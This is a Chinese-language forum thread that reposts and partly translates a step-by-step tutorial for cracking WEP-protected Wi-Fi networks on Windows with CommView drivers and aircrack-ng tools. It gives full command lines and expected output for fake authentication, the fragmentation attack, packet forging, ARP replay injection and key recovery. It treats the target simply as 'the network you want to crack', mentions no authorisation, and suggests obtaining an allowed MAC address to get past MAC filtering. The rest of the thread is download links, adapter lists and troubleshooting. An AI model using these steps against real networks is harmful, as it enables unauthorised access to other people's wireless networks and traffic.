用aircrack+inject packets在windows下破解WEP

wenlua

用aircrack+inject packets在windows下破解WEP,有人发过吗?是TAZ论坛上面的,有人发过就不发了.

wenlua

算了,发上来再说了,英文原文.如果有需要再翻译

GETTING EVERYTHING READY:

- The first and most important thing to do is to get an adapter that works with airodump:
check this thread for that:
http://tazforum.thetazzone.com/viewtopic.php?t=6235
and this one:
http://tazforum.thetazzone.com/viewtopic.php?t=5401&start=0

- Then you need to install the proper drivers for your card. (I used the commview drivers.) If your card isn't compatible with Commview you'll need to install the wildpackets drivers.

to do this for cards compatible with commview download commview here and install its drivers:
http://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=/files/ca5.zip

for other cards download the wildpackets drivers here:
http://www.wildpackets.com/support/downloads/drivers

NOTE: I'm going to base the rest of this tutorial on a card with the commview drivers installed!

- Next step is to download this .dll file (again only commview driver users):
http://darkircop.org/commview.dll

- Next up, download the aircrack package. Download it here:
http://dl.aircrack-ng.org/aircrack-ng-svn-win.zip

unzip the file to your c:\ drive (it can be another drive but this is the easiest)

put the commview.dll file you just downloaded in the map you extracted (it's called aircrack and if you extracted it to your c: drive like I said it should be in c:\aircrack\)

Now go to you place where you installed Commview in (the program itself) and look for a file called "ca2k.dll" (default install dir is c:\program files\commview for wifi\)

Copy this file to the same folder as the commview.dll (c:\aircrack\)

OKAY that was a whole lot! this was just to get everything ready! If you did all of this correct you'll be able to move to the next step!
-------------------------------------------------------------------------------------------

THE CRACKING:

Step 1:
- Open a command prompt (start > run > cmd.exe)

Step 2:
- type the following in the command prompt:

Quote:

cd c:\aircrack\

- HIT ENTER

Step 3:
- type the following in the same command prompt:

Quote:

airserv-ng -d commview.dll

- HIT ENTER
- You should see something like this coming up in the command prompt

Quote:

Opening card commview.dll Setting chan 1 Opening sock port 666 Serving commview.dll chan 1 on port 666

Step 4:
- Open a new command prompt (LEAVE THE PREVIOUS ONE OPEN AT ALL TIMES!!)
- Typ the following the the new command prompt:

Quote:

cd c:\aircrack\

-HIT ENTER

Step 5:
- Now typ this in the same command prompt:

Quote:

airodump-ng 127.0.0.1:666

- HIT ENTER

note: if you know what channel the to-monitor-network is on you can make it this. I recommend this!:

Quote:

airodump-ng --channel YOURCHANNELNUMBER HERE 127.0.0.1:666

Airodump-ng should start capturing data from the networks on the given channel now, you'll notice it isn't going fast (except if it's a big company's network or something). We are going to speed this process up!
Take a note of the following:
1: BSSID of the network you want to crack = MAC address.
2: ESSID of the network you want to crack = name of the network (example: wifi16, mynetwork,...)
3: The mac of the card you are using to monitor the packets

LEAVE THE 2 COMMAND PROMPTS YOU ALREADY HAVE OPEN OPEN!!!

Step 6:
- Open a new command prompt
- Type in the following:

Quote:

cd c:\aircrack\

- HIT ENTER

Step 7:
- Type in the following in command prompt:

Quote:

aireplay-ng -1 0 -e ESSID-OF-THE-NETWORK-YOU-WANT-TO-CRACK -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

yes quite confusing so a quick example:
ESSID = wifi16
BSSID = 11:22:33:44:55:66
MAC OF CARD I'M USING = 01:23:45:67:89:01

so that will get me:
aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

if all goes well you'll get this as the outcome:

Quote:

Sending Authentication Request Authentication successful Sending Association Request Association successful

if you get:

Quote:

AP rejects the source MAC address

It means MAC filtering is enabled on the network you want to crack and you'll need to get hold of a mac address that's allowed access.

if you keep getting:

Quote:

sending authentication request

Try moving closer to the AP!

Step 8:
in the same command prompt as the one in step 7 type:

Quote:

aireplay-ng -5 -b BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

yes quite confusing once again so a quick example:
BSSID = 11:22:33:44:55:66
MAC OF CARD I'M USING = 01:23:45:67:89:01

so that will get me:
aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

if all goes well you'll get this:

Quote:

Waiting for a data packet... Read #number packets...

Step 9:
if you wait a little bit you'll soon be prompted with a packet like this:

Quote:

Size: 120, FromDS: 1, ToDS: 0 (WEP) BSSID = the bssid Dest. MAC = the dest mac Source MAC = the source mac 0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@. 0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz. 0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn. 0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0. 0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l.... 0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.).. 0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q.D...w.....<R. 0x0070: 0505 933f af2f 740e ...?./t. Use this packet ?

note: size can vary, I always pressed in y and it worked
- press in Y
- HIT ENTER

You should see something like this coming up (or similar):

Quote:

Saving chosen packet in replay_src-0124-161120.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0124-161129.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Note 1: It doesn't need to be 1500 bytes!!
Note 2: Check the bold part, you're going to need this file!
AGAIN DON'T CLOSE THIS COMMAND PROMPT!!

if you keep getting:

Quote:

Data packet found! Sending fragmented packet No answer, repeating... Trying a LLC NULL packet Sending fragmented packet No answer, repeating... Sending fragmented packet ...

Just keep trying! It automatically starts over again (moving closer to the AP has been reported to help.)



anyways, if you got the bytes of keystream (everything worked) it's time for the next step!

Step 10:
- Press CTRL + C in the command prompt used in step 8
- Now type in the following:

Quote:

packetforge-ng -0 -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR -k 192.168.1.100 -l (= an ELL not a 1) 192.168.1.1 -y fragment-0124-161129.xor -w arp-request

Remember the file I made bold in part 8? Well it's obviously the same as in 9 meaning you need to put the same filename here.
The part I made green here is the filename you use to save the packet, you can choose whatever you want but you must use this filename in the upcomming steps!

Step 11:
Now that we've got our ARP REQ packet we can start injecting!
Here's how to do this.
- Go to the command prompt used in step 9
- Type in the following:

Quote:

aireplay-ng -2 -r arp-request 127.0.0.1:666

The green part once again indicates the filename!

You should now see something like this coming up:

Quote:

Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:0F:B5:AB:CB:9D 0x0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d .A....l~@....... 0x0010: ffff ffff ffff 8001 6c48 0000 0999 881a ........lH...... 0x0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d I.!.x..B/....0.M 0x0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1 :.....gC.V$..... 0x0040: d64f b709 .O.. Use this packet ?

- Type in Y
- HIT ENTER

This should come up now:

Quote:

Saving chosen packet in replay_src-0124-163529.cap You should also start airodump-ng to capture replies. End of file. sent #numberOfPackets ... (#number pps)

You'll see the numberOfPackets rising really fast, you are injecting these packets now.

Step 12:
Now go back to the command prompt where you had airodump-ng in open
and press CTRL + C
now type in the following:

Quote:

airodump-ng --channel CHANNELYOUWANTTOCAPTUREFROM --write Filename 127.0.0.1:666

Note: Filename = The name of the file where the data packets are saved, this will be used in the next step

If all goes correct you should be capturing as much packets per second as you are injecting (maybe even more).

Step 13:
when you think you have enough...
note: 200000 min for 64bit (just capture 1Million to be sure)
...press CTRL + C in the command prompt that has airodump-ng running and enter the following:

Quote:

aircrack-ng -n 64 Filename.cap

note:
Filename = see previous step
64 = the bit depth of the key (128 for 128bit etc...)


and if it goes like planned a message will pop-up saying:

Quote:

KEY FOUND: YourKey

原帖 http://tazforum.thetazzone.com/viewtopic.php?t=6811&postdays=0&postorder=asc&start=0&sid=65a7c66b326f352c0608d61c5e60c477

wenlua

最新的aircrack-ng 0.91,大家不用到处搜了

http://download.aircrack-ng.org/aircrack-ng-0.9.1-win.zip

[em01]

jinjihu

强烈支持翻译成中文教程。这个对新手来说很有意义。

wenlua

Commview 支持的网卡下面是清单

CommView for WiFi is a tool for monitoring wireless 802.11a/b/g networks. To use this product, you must have a compatible wireless adapter. To enable the monitoring features of your wireless adapter, you will need to use the special driver that comes with this product. This brief manual will guide you through the installation process. Depending on the adapter model and operating system, the provided driver will work in one of the following modes:

Dual Mode (Connectivity + Monitoring): When CommView for WiFi is not running, your adapter will be able to communicate with other wireless hosts or access points, just like when you are using the original driver supplied by the adapter manufacturer. When CommView for WiFi is running, your adapter will be put in passive, promiscuous monitoring mode.
Monitoring-only Mode: Your adapter will be used for monitoring only. You will not be able to use it for communicating with other wireless hosts or access points. To restore the standard functions of your adapter, you would need to roll back/return to the original adapter's driver supplied by the vendor.
To use the adapter in dual mode, you must be running Windows XP or Vista, your adapter must be a 802.11b/g or 802.11a/b/g adapter (this won't work with older 802.11b adapters; there are exceptions for Intel adapters, see technical notes), and you must uninstall any vendor-supplied adapter configuration utilities and let Windows use the built-in wireless configuration utility. If these conditions are not met, monitoring-only mode is available.
Prior to installing the new driver for your wireless adapter, be sure that your adapter is compatible with this product. The adapters that have been tested and are compatible with CommView for WiFi are listed below. The Driver Installation Wizard can be found at the bottom of this page.

New 802.11b/g and 802.11a/b/g adapters

3Com OfficeConnect Wireless a/b/g PC Card (3CRWE154A72)
Atheros AR5001A Wireless Network Adapter
Atheros AR5001X Cardbus Wireless Network Adapter
Atheros AR5001X Mini PCI Wireless Network Adapter
Atheros AR5001X+ Wireless Network Adapter
Atheros AR5002G Wireless Network Adapter
Atheros AR5004G Wireless Network Adapter
Atheros AR5004X Wireless Network Adapter
Atheros AR5005G Wireless Network Adapter
Atheros AR5005GS Wireless Network Adapter
Atheros AR5006EG Wireless Network Adapter
Atheros AR5006EGS Wireless Network Adapter
Atheros AR5006EX Wireless Network Adapter
Atheros AR5006EXS Wireless Network Adapter
Atheros AR5006G Wireless Network Adapter
Atheros AR5006GS Wireless Network Adapter
Atheros AR5006X Wireless Network Adapter
Atheros AR5006XS Wireless Network Adapter
Atheros AR5007EG Wireless Network Adapter
Atheros AR5007G Wireless Network Adapter
Cisco Aironet 802.11a/b/g Wireless Cardbus Adapter
D-Link AirPlus G DWL-G630 Wireless Cardbus Adapter (Rev. C, Rev. D)
D-Link AirPlus Xtreme G DWL-G520 Adapter
D-Link AirPlus Xtreme G DWL-G650 Adapter *
D-Link AirPremier DWL-AG530 Wireless PCI Adapter
D-Link AirPremier DWL-AG660 Wireless Cardbus Adapter
D-Link AirPremier DWL-G680 Wireless Cardbus Adapter
D-Link AirXpert DWL-AG520 Wireless PCI Adapter
D-Link AirXpert DWL-AG520 Wireless PCI Adapter(rev.B)
D-Link AirXpert DWL-AG650 Wireless Cardbus Adapter
D-Link AirXpert DWL-AG650 Wireless Cardbus Adapter(rev.B)
D-Link WNA-2330 RangeBooster G Notebook Adapter
Gigabyte GN-WI01GT (mini) PCI-E WLAN Card
Gigabyte GN-WI01HT (mini) PCI WLAN Card
Gigabyte GN-WI07HT (mini) PCI-E WLAN Card
Gigabyte GN-WIAG/GN-WPEAG (mini) PCI WLAN Card
Gigabyte GN-WIAH (mini) PCI WLAN Card
Gigabyte GN-WLMA102 Cardbus WLAN Card
Gigabyte GN-WM01GT Cardbus WLAN Card
Gigabyte GN-WMAG Cardbus WLAN Card
Gigabyte GN-WP01GT (mini) PCI WLAN Card
Intel PRO/Wireless 2200BG Mini PCI Adapter *
Intel PRO/Wireless 2915ABG Mini PCI Adapter *
LinkSys WPC55AG Dual-Band Wireless A+G Notebook Adapter
NETGEAR WAG511 802.11a/b/g Dual Band Wireless PC Card
NETGEAR WG511T 108 Mbps Wireless PC Card
NETGEAR WG511U 54AG+ Wireless PC Card
NETGEAR WG511U Double 108 Mbps Wireless PC Card
NETGEAR WPN311 RangeMax(TM) Wireless PCI Adapter
NETGEAR WPN511 RangeMax(TM) Wireless PC Card
Proxim ORiNOCO 802.11a/g ComboCard Gold 8480
Proxim ORiNOCO 802.11a/g ComboCard Silver 8481
Proxim ORiNOCO 802.11a/g PCI Adapter 8482
Proxim ORiNOCO 802.11b/g ComboCard Gold 8470
Proxim ORiNOCO 802.11b/g ComboCard Silver 8471
SMC 2336W-AG v2 Universal Wireless Cardbus Adapter
TRENDnet TEW-501PC 108Mbps 802.11a/g Wireless CardBus PC Card

Old 802.11b adapters

3Com 3CRWE7373 AirConnect Wireless LAN Card
3Com 3CRWE737A AirConnect Wireless LAN Card
3Com 3CRWE777A AirConnect Wireless LAN PCI Card
Actiontec 802.11b Wireless PC Card
Actiontec MiniPCI 802.11b Wireless Adapter
Actiontec PCI 802.11b Wireless Adapter
Belkin F5D6000 Wireless PCI Network Adapter
Belkin F5D6020 v.1 Wireless PCMCIA Network Adapter *
BENQ AWL100 Wireless LAN PCMCIA Adapter
Cisco Systems 340 Series PCI Wireless LAN Adapter *
Cisco Systems 340 Series PCMCIA Wireless LAN Adapter *
Cisco Systems 350 Series PCI Wireless LAN Adapter *
Cisco Systems 350 Series PCMCIA Wireless LAN Adapter *
Compaq WL100 11Mbps Wireless LAN PC Card
Compaq WL200 11Mbps Wireless LAN PCI Card
Corega PCCL-11 Wireless LAN PCMCIA Card *
Dell TrueMobile 1150 Series Card
Dell TrueMobile 1150 Series Mini PCI Card
DemarcTech Reliawave 802.11b Wireless PC Card
D-Link DWL-500 Wireless PCMCIA Adapter
D-Link DWL-520 Wireless PCI Adapter *
D-Link DWL-650 Wireless PCMCIA Adapter *
D-Link DWL-650H 11Mbps WLAN PC Card
Ericsson DSSS Wireless LAN PC Card
Ericsson DSSS Wireless LAN PCI Card
Fujitsu IEEE 802.11 Wireless LAN/CF Card (3V)
Fujitsu IEEE 802.11 Wireless LAN/CF Card (5V)
Fujitsu MiniPCI Wireless LAN Card
Fujitsu PCI Wireless LAN Card
Intel PRO/Wireless 2011 LAN PC Card
Intel PRO/Wireless 2011 LAN PCI Card
LAN-Express IEEE 802.11 PCI Adapter
LinkSys WPC11 Wireless PC Card v.2.5 and v.3
Lucent ORiNOCO Card
Microsoft MN-520 Wireless Notebook Adapter
NETGEAR MA301 Wireless PCI Adapter
NETGEAR MA311 Wireless PCI Adapter
NETGEAR MA401 Wireless PC Card
NETGEAR MA701 Wireless CF Card
Nortel Networks e-mobility 802.11b Wireless LAN PC Card
Nortel Networks e-mobility 802.11b Wireless LAN PCI Card
Nortel Networks e-mobility 802.11b WLAN PC Card
Planet WL-3550 Wireless PC Card
Repotec IEEE802.11b WLAN PCI Card v2.5
Repotec RP-2061 11Mbps Wireless LAN PCMCIA Card
Repotec RP-2064 Wireless PCI Card Reader Ver.1.5
Siemens I-Gate 11M PC Card
SMC2632W V.1 EZ Connect Wireless PC Card
SparkLAN Wireless LAN 11Mbps PC Card
Symbol LA4111 Spectrum24 Wireless LAN PC Card
Symbol LA4113 Spectrum24 Wireless LAN PCI Card
Symbol Spectrum24 802.11b Wireless LAN PCI Card
Symbol Spectrum24 LA-4100 Series Wireless LAN PC Card
TrendWare TEW-PC16 Wireless PCMCIA Network Card
U.S. Robotics Wireless 802.11b PC Card
Xircom Wireless Ethernet Adapter
Z-Com LANEscape/XI-300 PC Card

* Please read important technical notes about these cards.http://www.tamos.com/products/commwifi/technotes.php

jinjihu

http://tinyshell.be/aircrackng/forum/index.php?PHPSESSID=4d6ea5f467465c0c5136a0c77f53a124&topic=1626.30

来个图文并茂的。

兄弟，你发的文件包里，第一程序就没有，昏。你自己有测试过吗？呵呵。

jinjihu

今天比较昏啊。

上午刚买WUSB54GC在BT2玩了一天，没有花头出来。

晚上有WINDOWS玩，有没有合适的网卡了。

INTEL 3945ABG怎么不支持啊，老天。

wenlua

很奇怪不能用了,大家替换一下aircrack-ng 0.91,里面的这个文件就可以了.

wenlua

你适适看能不能装wildpackets的驱动了.地址在这里http://products.wildpackets.com/?v=n7yrf8rzf5wr0105&s=1

jinjihu

这个网站说INTEL 3945ABG是不需要驱动的啊[em06][em06][em06]

wenlua

这篇文章是介绍怎么在Windows xp 下面使用airrack和注射式攻击来破解WEP

 

A首先你需要正确安装网卡驱动: 如果你的网卡不被commview支持的话,那么你需要安装wildpackets的驱动.

 

A1如果你的网卡被commview支持的话,那么点下面的地址下载驱动:

 

http://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=/files/ca5.zip

 

A2 如果不被commview支持的网卡则可以下载widpackets的驱动:

 

http://www.wildpackets.com/support/downloads/drivers

 

注意:下面的教程是在你正确安装commview的驱动的前提下进行的!

 

B 你需要下载这个.dll文件(只适用于commview 的网友):

http://darkircop.org/commview.dll

 

C 你需要下载aircrack 压缩包: http://dl.aircrack-ng.org/aircrack-ng-svn-win.zip

 

D 解压aircrack 压缩包到你的任意硬盘根目录,在这里我是解压到c盘

 

E 把B下载到的commview.dll 放到D解压的文件夹,应该放到目录c:\aircrack\

 

F 去目录c:\program files\commview for wifi\(注意这个目录是安装完commview以后才会有,也就是A1你下载的文件),然后找到”ca2k.dll”文件,把”ca2k.dll”,拷贝到(c:\aircrack).

 

当你完成以上准备以后,就可以开始正式的破解了!

 

破解:

 

1:

打开一个命令提示符 (开始 > 运行 > cmd.exe)

 

2:

在命令提示符窗口下面输入:

 

       Cd c:\aircrack

 

-按下回车

 

 

 

 

wenlua

3

在命令相同的提示符窗口下面输入:

 

       airserv-ng -d commview.dll

 

-按下回车

你看到的回复应该跟下面一样:

 

Opening card commview.dll
Setting chan 1
Opening sock port 666
Serving commview.dll chan 1 on port 666

 

如果你没有看到上面的结果的话,而是看到下面的结果的话:

 

注意这里可能会有两种情况出现!!!!!:

 

(1)

 

"Opening card commview.dll
Adapter not found
get_guid()
airserv-ng: wi_open(): No error"

 

这种情况那么你可以试试这个命令:

 

airserv-ng -d "commview.dll|debug"

 

然后你可能会看到下面的结果

 

Opening card commview.dll|debug
Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470
get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co
mboCard Gold - Paketplaner-Miniport
Adapter not found
get_guid()
airserv-ng: wi_open(): No error

 

那么你只要输入下面的命令就可以了

 

airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"

 

或者会自动搜寻网卡,然后提示你是不是这个网卡,然你远yes/no,那么你需要选择yes就可以了

 

(2)

 

"Opening card commview.dll
F1
init_lib()
airserv-ng: wi_open(): No error"

 

这种情况的话,那么你应该是由于安装了,windpackets 驱动而产生的问题,那么建议你安装commview 驱动,如果可能的话.

 

 

4

 

-注意现在重新开一个新的命令提示符窗口(我叫它窗口2),不要关掉前面的那个(窗口1)!!!

 

-在窗口2输入命令如下:

 

       cd c:\aircrack\

 

按回车

 

5

 

-在窗口2输入命令如下:

      

       airodump-ng 127.0.0.1:666

 

回车

 

提示: 如果你知道需要监视那个频道的话,那么你可以输入以下命令,我建议你这样做!!!:

 

airodump-ng --channel 你的频道号 127.0.0.1:666

      

       比如说我需要监视的频道是6,那么命令如下

 

       airodump-ng --channel 6 127.0.0.1:666

 

好了,现在airodump-ng 现在应该已经开始截取数据了,后面我们会使用注射式攻击来提高数据包的获取速度.